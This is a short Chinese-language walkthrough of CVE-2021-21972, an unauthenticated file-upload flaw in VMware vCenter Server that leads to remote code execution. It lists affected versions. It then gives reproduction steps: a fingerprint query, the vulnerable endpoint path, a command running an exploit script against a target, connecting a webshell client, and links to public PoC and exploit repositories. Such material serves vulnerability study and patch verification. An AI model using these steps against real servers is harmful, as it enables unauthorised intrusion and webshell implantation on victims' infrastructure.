一、漏洞背景
vSphere 是 VMware 推出的虛擬化平台套件,包含 ESXi、vCenter Server 等一系列的軟件。其中 vCenter Server 為 ESXi 的控制中心,可從單一控制點統一管理數據中心的所有 vSphere 主機和虛擬機,使得 IT 管理員能夠提高控制能力,簡化入場任務,並降低 IT 環境的管理復雜性與成本。
vSphere Client(HTML5)在 vCenter Server 插件中存在一個遠程執行代碼漏洞。未授權的攻擊者可以通過開放 443 端口的服務器向 vCenter Server 發送精心構造的請求,從而在服務器上寫入 webshell,最終造成遠程任意代碼執行。
簡而言之:就是VMware這個套件有個Web管理界面,漏洞在一個未授權的上傳接口,寫入shell並執行命令。(所以嚴格意義上講應該是上傳漏洞,看過好幾個文章叫法各異。無所謂了,明白原理就好)
二、影響范圍
VMware vCenter Server 7.0系列 < 7.0.U1c
VMware vCenter Server 6.7系列 < 6.7.U3l
VMware vCenter Server 6.5系列 < 6.5 U3n
VMware ESXi 7.0系列 < ESXi70U1c-17325551
VMware ESXi 6.7系列 < ESXi670-202102401-SG
VMware ESXi 6.5系列 < ESXi650-202102101-SG
三、利用難度
容易;且危害較大
四、復現過程
1.
title="+ ID_VC_Welcome +"
2.訪問未授權接口
/ui/vropspluginui/rest/services/updateova
返回狀態碼405:漏洞可能存在
3.執行腳本
python CVE-2021-21972.py -url https://1.1.1.1
冰蠍3連接
/usr/lib/vmware-sca/conf/sca.properties
https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC //poc
https://github.com/NS-Sp4ce/CVE-2021-21972 //exp
參考文章:
https://mp.weixin.qq.com/s/ovfH6niw8smOktmmoNxDdg
https://mp.weixin.qq.com/s/4eLgKuBpdXdT1cQBtzXl1w
https://mp.weixin.qq.com/s/tg64Hy8KECjYPHt98vBLcQ